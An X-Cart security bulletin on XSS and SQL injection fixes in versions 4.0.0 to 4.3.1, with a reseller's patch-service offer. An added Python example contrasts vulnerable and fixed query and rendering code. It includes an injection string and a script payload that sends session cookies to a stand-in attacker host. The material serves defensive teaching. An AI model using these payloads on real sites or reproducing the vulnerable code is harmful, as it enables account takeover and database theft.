X-Cart Software Security bulletin 2010-17-03
During an internal audit we found minor security issues that could let an attacker gain access to the X-Cart application back end.
Qualiteam has released a security update that includes the following improvements.
4.0.x branch:
- protection from XSS attacks has been added (for 4.0.0-4.0.19)
- protection from SQL injection attacks has been improved (for 4.0.0-4.0.18)
4.1.x branch:
- protection from XSS attacks has been added (for 4.1.0-4.1.8).
NOTE: If you run version 4.1.9 or 4.1.10, apply all previous security patches.
4.2.x and 4.3.x branches (all versions):
- protection from XSS attacks has been improved.
IMPACT
- An attacker can inject active content (for instance, JavaScript) into pages served by the application and use it to trick users into disclosing data. Script running in a victim's browser can also read the session cookie, letting the attacker take over the account and impersonate the user.
- By placing certain characters in URL parameters that the application inserts into SQL queries, an attacker can pass SQL commands through the web application and read sensitive information from the database.
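The two bug classes above, shown as an added example that is not X-Cart or Qualiteam code and says nothing about where the bugs sat in X-Cart. It is a generic Python illustration of both the XSS and the SQL injection pattern described in this bulletin: a vulnerable lookup and a vulnerable page fragment beside their hardened forms. The store URL, the customers table, the column names and the payloads are all constructed for the demo.

```python
"""Generic illustration of the bulletin's two bug classes (added example).

Assumptions (not from the bulletin): a `customers` table with login, email
and password_hash columns, a hypothetical URL shop.example/customer.php, and
a constructed attacker payload in each case.
"""
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed attacker inputs. The SQL payload is percent-encoded as it would
# travel in a real request: x' OR '1'='1
SQLI_URL = "https://shop.example/customer.php?login=x%27%20OR%20%271%27%3D%271"
XSS_PAYLOAD = (
    "<script>document.location='https://evil.example/?c='"
    "+document.cookie</script>"
)


def build_store():
    """In-memory stand-in for the shop database with two sample customers."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (login TEXT, email TEXT, password_hash TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers VALUES (?, ?, ?)",
        [("alice", "alice@example.com", "hash-a"),
         ("bob", "bob@example.com", "hash-b")],
    )
    return conn


def param_from_url(url, name):
    """Return the (decoded) value of one query-string parameter, or ''."""
    return parse_qs(urlsplit(url).query).get(name, [""])[0]


def lookup_vulnerable(conn, login):
    """String-concatenated query: a quote in `login` rewrites the WHERE clause."""
    sql = "SELECT login, email FROM customers WHERE login = '" + login + "'"
    return conn.execute(sql).fetchall()


def lookup_fixed(conn, login):
    """Parameterised query: the driver sends `login` as data, never as SQL."""
    return conn.execute(
        "SELECT login, email FROM customers WHERE login = ?", (login,)
    ).fetchall()


def render_vulnerable(name):
    """Reflects user input into HTML unchanged, so <script> is executed."""
    return "<p>Search results for: " + name + "</p>"


def render_fixed(name):
    """Escapes <, >, &, \" and ' so the input is displayed, not executed."""
    return "<p>Search results for: " + html.escape(name, quote=True) + "</p>"


def demo():
    conn = build_store()
    login = param_from_url(SQLI_URL, "login")
    print("vulnerable lookup :", lookup_vulnerable(conn, login))  # every row
    print("fixed lookup      :", lookup_fixed(conn, login))       # []
    print("vulnerable render :", render_vulnerable(XSS_PAYLOAD))
    print("fixed render      :", render_fixed(XSS_PAYLOAD))


if __name__ == "__main__":
    demo()
```

The concatenated query turns the single parameter into `WHERE login = 'x' OR '1'='1'` and dumps every customer; the parameterised version returns nothing because no login literally equals the payload string. On the output side, escaping at render time is what the bulletin's "protection from XSS attacks" amounts to in principle; as an independent, defence-in-depth measure (not something the bulletin claims), marking the session cookie HttpOnly keeps `document.cookie` from exposing it even if a script does get injected.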
AFFECTED VERSIONS
All X-Cart versions from 4.0.0 to 4.3.1
SOLUTION
We strongly recommend that you apply the security fix to secure your store.
You can:
(1) undertake the patch application yourself (the patch and instructions are available in your Qualiteam helpdesk) or
(2) have us undertake the task for you for $44.00 – simply follow this link – http://www.justxcart.com.au/x-cart/x-cart-security-patch-application-service.html – and once your order is received we will schedule your security task, or
(3) spend technical support points and have Qualiteam/X-Cart assist you.
If you have any questions, please don’t hesitate to contact support@justxcart.com.au.